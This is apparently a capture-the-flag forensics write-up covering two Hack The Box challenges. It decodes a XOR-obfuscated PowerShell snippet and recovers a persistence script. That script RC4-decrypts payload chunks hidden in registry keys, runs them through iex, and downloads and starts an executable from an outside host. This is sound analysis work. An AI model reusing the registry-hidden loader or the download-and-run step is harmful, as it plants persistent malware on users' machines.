Forensics - HackMD

# Forensics ## Puppeteer - H3cko Found a malicious powershell code: ```bash [byte[]] $stage1 = 0x99, 0x85, 0x93, 0xaa, 0xb3, 0xe2, 0xa6, 0xb9, 0xe5, 0xa3, 0xe2, 0x8e, 0xe1, 0xb7, 0x8e, 0xa5, 0xb9, 0xe2, 0x8e, 0xb3; [byte[]] $stage2 = 0xac, 0xff, 0xff, 0xff, 0xe2, 0xb2, 0xe0, 0xa5, 0xa2, 0xa4, 0xbb, 0x8e, 0xb7, 0xe1, 0x8e, 0xe4, 0xa5, 0xe1, 0xe1; [array]::Reverse($stage2); $stage3 = $stage1 + $stage2; for($i=0;$i -lt $stage3.count;$i++){ $stage3[$i] = $stage3[$i] -bxor 0xd1; } $stage3 | % { $a += [char] $_ } Write-Host $a # Output: HTB{b3wh4r3_0f_th3_b00t5_0f_just1c3...} ``` ## Golden Persistance - Matixx22 I've used `Registry explorer` to analyze a file. Found encoded script in bookmarsk `Run` register. Decoded in online tool: ```bash function encr { param( [Byte[]]$data, [Byte[]]$key ) [Byte[]]$buffer = New-Object Byte[] $data.Length $data.CopyTo($buffer, 0) [Byte[]]$s = New-Object Byte[] 256; [Byte[]]$k = New-Object Byte[] 256; for ($i = 0; $i -lt 256; $i++) { $s[$i] = [Byte]$i; $k[$i] = $key[$i % $key.Length]; } $j = 0; for ($i = 0; $i -lt 256; $i++) { $j = ($j + $s[$i] + $k[$i]) % 256; $temp = $s[$i]; $s[$i] = $s[$j]; $s[$j] = $temp; } $i = $j = 0; for ($x = 0; $x -lt $buffer.Length; $x++) { $i = ($i + 1) % 256; $j = ($j + $s[$i]) % 256; $temp = $s[$i]; $s[$i] = $s[$j]; $s[$j] = $temp; [int]$t = ($s[$i] + $s[$j]) % 256; $buffer[$x] = $buffer[$x] -bxor $s[$t]; } return $buffer } function HexToBin { param( [Parameter( Position=0, Mandatory=$true, ValueFromPipeline=$true) ] [string]$s) $return = @() for ($i = 0; $i -lt $s.Length ; $i += 2) { $return += [Byte]::Parse($s.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber) } Write-Output $return } [Byte[]]$key = $enc.GetBytes("Q0mmpr4B5rvZi3pS") $encrypted1 = (Get-ItemProperty -Path HKCU:\SOFTWARE\ZYb78P4s).t3RBka5tL $encrypted2 = (Get-ItemProperty -Path HKCU:\SOFTWARE\BjqAtIen).uLltjjW $encrypted3 = (Get-ItemProperty -Path HKCU:\SOFTWARE\AppDataLow\t03A1Stq).uY4S39Da $encrypted4 = (Get-ItemProperty -Path HKCU:\SOFTWARE\Google\Nv50zeG).Kb19fyhl $encrypted5 = (Get-ItemProperty -Path HKCU:\AppEvents\Jx66ZG0O).jH54NW8C $encrypted = "$($encrypted1)$($encrypted2)$($encrypted3)$($encrypted4)$($encrypted5)" $enc = [System.Text.Encoding]::ASCII [Byte[]]$data = HexToBin $encrypted $DecryptedBytes = encr $data $key $DecryptedString = $enc.GetString($DecryptedBytes) $DecryptedString|iex ``` Get all hex data from registers in the script and and follow the commands to decode it. Flag is in $DecodedString: ```bash $path ="C:\ProgramData\windows\goldenf.exe";$exists = Test-Path -Path $path -PathType Leaf; if ( $exists ){ Start-Process $path } else{ mkdir "C:\ProgramData\windows"; Invoke-WebRequest -Uri https://thoccarthmercenaries.edu.tho/wp-content/goldenf.exe -OutFile $path; $flag="HTB{g0ld3n_F4ng_1s_n0t_st34lthy_3n0ugh}"; Start-Process $path } ``` Flag: `HTB{g0ld3n_F4ng_1s_n0t_st34lthy_3n0ugh}`